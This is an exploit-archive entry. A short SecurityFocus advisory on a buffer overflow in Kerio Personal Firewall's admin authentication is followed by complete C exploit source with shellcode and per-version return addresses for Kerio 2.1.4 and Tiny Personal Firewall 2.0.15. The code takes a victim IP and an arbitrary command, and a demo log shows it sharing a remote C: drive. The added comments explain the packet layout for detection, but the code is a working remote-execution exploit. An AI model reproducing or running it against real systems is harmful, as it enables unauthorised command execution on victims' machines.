// source: https://www.securityfocus.com/bid/7180/info
A buffer-overflow vulnerability has been discovered in Kerio Personal Firewall. The problem occurs during the administration authentication process. An attacker could exploit this vulnerability by forging a malicious packet containing an excessive data size. The application then reads this data into a static memory buffer without first performing sufficient bounds checking.
Successful exploits of this vulnerability may allow an attacker to execute arbitrary commands on a target system, with the privileges of the firewall.
Note that this vulnerability affects Kerio Personal Firewall 2.1.4 and earlier.
/**************************************************************
* Personal Firewall Engine remote buffer overflow Exploit
**************************************************************
*
* Original information shared by CORE Security Technologies.
* ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
* http://www.coresecurity.com/common/showdoc.php?idx=314&idxseccion=10
* ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
* Released : 30/04/2003
*
* Coded By ThreaT.
* ThreaT@Ifrance.com
* http://s0h.cc/~threat
*
********************************************************************
*
* This exploit takes advantage of the vulnerability discovered by
* CORE Security Technologies to execute a command on remote workstations
* equipped with the following PSW :
*
* - Tiny Personal Firewall 2.0.15
* - Kerio Personal Firewall 2.1.4
*
*********************************************************************
*
* Usage : PFExploit.exe <target> <victim_ip> <command to execute>
*
* =====================================================================
* !! compile with : cl.exe /nologo PFExploit.c /link wsock32.lib !!
* =====================================================================
*/
#include <windows.h>
#include <winsock.h>
#define len 0x1494
/*
 * Program entry point (non-standard `void main`, no return value).
 *
 * Builds one oversized message for the personal-firewall administration
 * service described in the advisory text above and delivers it to the
 * address in argv[2] on TCP port 44334.  argv[1] selects a row of the
 * target table (TPF or KPF); argv[3] is appended verbatim after the
 * machine-code bytes.  Every failure path calls ExitProcess(0); the
 * results of socket(), bind() and send() are not checked.
 *
 * From a detection standpoint the observable traffic is a 4-byte
 * big-endian length field equal to 0x1494 followed by exactly 0x1494
 * bytes, most of them 0x90 filler, with the payload at offset 200 and a
 * 4-byte per-target value at offset 0x1490.  Per the advisory text at
 * the top of the page, only the product versions named in the file
 * header are listed as affected.
 */
void main (int argc, char *argv[])
{
SOCKET sock1;                 /* TCP socket to the remote service */
SOCKADDR_IN sin;              /* remote endpoint (argv[2]:44334) */
int i;                        /* index into targ[] chosen from argv[1] */
DWORD byte = htonl(len);      /* length prefix in network byte order, sent before buffer */
char buffer[len], *p,         /* buffer: the 0x1494-byte message; p: shellcode + argv[3] */
shellcode[] =
/* Opaque machine-code bytes copied verbatim into the message; they are
 * not analysed here.  strlen() is applied to this array below, which
 * relies on it containing no 0x00 byte. */
"\xEB\x69\x6A\x30\x5B\x64\x8B\x03\x8B\x40\x0C\x8B\x48\x0C\x8B\xC1"
"\x8B\x70\x30\x80\x3E\x4B\x75\x4A\x8B\x40\x18\x8B\x58\x3C\x03\xD8"
"\x8B\x5B\x78\x03\xD8\x8B\x73\x1C\x03\xF0\x56\x8B\x73\x24\x03\xF0"
"\x56\x8B\x53\x20\x03\xD0\x8B\x5B\x18\x4B\x8B\x34\x9A\x03\xF0\x03"
"\x74\x24\x10\x8B\x36\x39\x74\x24\x0C\x74\x08\x4B\x23\xDB\x75\xEA"
"\x58\x58\xC3\x5F\x33\xC9\x66\x8B\x0C\x5F\x5F\x8B\x3C\x8F\x8D\x04"
"\x07\xC3\x8B\x18\x39\x08\x8B\xC3\x75\xA6\xC3\xEB\x22\x6A\x01\x68"
"\x69\x6E\x45\x78\xE8\x89\xFF\xFF\xFF\x6A\x01\xFF\x74\x24\x0C\xFF"
"\xD0\x6A\x01\x68\x78\x69\x74\x50\xE8\x75\xFF\xFF\xFF\xFF\xD0\xE8"
"\xD9\xFF\xFF\xFF";
WSADATA wsadata;
WORD wVersionRequested = MAKEWORD (2,0);   /* request Winsock 2.0 */
/* One row per supported build: the command-line tag, the 4 bytes written
 * at buffer offset 0x1490 (named RetAddr, so presumably a build-specific
 * return address -- not verified here), and a display name.  The values
 * are hard-coded for the exact versions named in App. */
struct _target {
char Name[4];
char *RetAddr;
char *App;
} targ[2] = {
{"TPF" , "\xED\xEA\x2F\x01", "Tiny Personal Firewall 2.0.15"},
{"KPF" , "\xF8\xEA\x61\x01", "Kerio Personal Firewall 2.1.4"},
};
printf ("#############################################################\n"
"Personal Firewall Engine, Remote buffer overflow Exploit !\n"
"#############################################################\n"
"Discovered by CORE Security Technologies & Coded by ThreaT\n-\n"
"ThreaT@Ifrance.com\n"
"http://s0h.cc/~threat\n-\n\n");
/* Three positional arguments are required: target tag, IP, command. */
if (argc < 4)
{
printf ("usage : PFExploit.exe <target> <victim_ip> <command to execute>\n\n"
"TARGET ARE\n"
"__________\n\n"
"TPF : for Tiny Personal Firewall 2.0.15\n"
"KPF : for Kerio Personal Firewall 2.1.4\n\n");
ExitProcess (0);
}
/* Room for shellcode + argv[3] + terminator (the +3 leaves slack); LPTR
 * zero-fills the allocation.  p is never freed (process exits shortly). */
if (!(p = (char *) LocalAlloc (LPTR,(strlen (shellcode)+strlen(argv[3])+3))))
{
printf ("error, cannot allocate memory\n");
ExitProcess (0);
}
memset (buffer,0x90,len);              /* fill the whole message with 0x90 (x86 NOP) */
strcpy (p,shellcode);                  /* shellcode bytes first ... */
lstrcat (p,argv[3]);                   /* ... then the user-supplied command string */
memcpy (&buffer[200],p,strlen (p)+1);  /* payload plus its NUL lands at offset 200 */
/* Case-insensitive lookup of argv[1] in the target table. */
for (i=0; i < 2 ; i++)
if (!lstrcmpi (argv[1],targ[i].Name)) break;
if (i > 1)                             /* no row matched */
{
printf ("Erreur : la cible %s est inconnue\n",argv[1]);
ExitProcess (0);
}
if (WSAStartup(wVersionRequested, &wsadata))
{
printf ("Erreur d'initialisation Winsock\n");
ExitProcess (0);
}
/* Remote endpoint; the port is hard-coded and inet_addr() is not checked
 * for INADDR_NONE. */
sin.sin_family = AF_INET;
sin.sin_addr.s_addr=inet_addr (argv[2]);
sin.sin_port = htons (44334);
/* The last 4 bytes of the message (0x1490..0x1493) carry the per-target value. */
memcpy (&buffer[0x1490],targ[i].RetAddr,4);
printf ("Cible : %s\n\n"
"Connecting to %s...", targ[i].App, argv[2]);
sock1 = socket (AF_INET, SOCK_STREAM, 0);   /* result not checked */
/* bind() is called with the *remote* address; its result is ignored. */
bind (sock1, (SOCKADDR *)&sin, sizeof (sin));
if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) )
{
printf ("connexion failed !\n");
ExitProcess (0);
}
printf ("ok!\n\n"
"sending crash for remote execution of '%s'...",argv[3]);
Sleep (1000);                          /* one-second pause before transmitting */
/* Wire format: 4-byte big-endian length (0x1494), then the 0x1494-byte
 * message.  Neither send() result is checked. */
send (sock1,(const char FAR *)(DWORD)&byte,sizeof (DWORD),0);
send (sock1,buffer,len,0);
puts ("ok");
}
/* DEMO ON MY LAN *
D:\code\exploits\kerio>ipconfig
Configuration IP de Windows 2000
Ethernet carte Connexion au réseau local 2 :
État du media . . . . . . . . . . : Câble Déconnecté
Ethernet carte Connexion au réseau local :
Suffixe DNS spéc. à la connexion. : ThreaT.lan
Adresse IP. . . . . . . . . . . . : 10.0.0.1
Masque de sous-réseau . . . . . . : 255.0.0.0
Passerelle par défaut . . . . . . : 10.0.0.138
D:\code\exploits\kerio>net view \\10.0.0.3
La liste est vide.
D:\code\exploits\kerio>PFExploit TPF 10.0.0.3 "cmd /c net share c=c:\"
#############################################################
Personal Firewall Engine, Remote buffer overflow Exploit !
#############################################################
Discovered by CORE Security Technologies & Coded by ThreaT
-
ThreaT@Ifrance.com
http://s0h.cc/~threat
-
Cible : Tiny Personal Firewall 2.0.15
Connecting to 10.0.0.3...ok!
sending crash for remote execution of 'cmd /c net share c=c:"'...ok
D:\code\exploits\kerio>net view \\10.0.0.3
Ressources partagées de \\10.0.0.3
Nom Type Local Remarque
-------------------------------------------------------------------------------
c Disque
La commande s'est terminée correctement.
D:\code\exploits\kerio>
* EOF */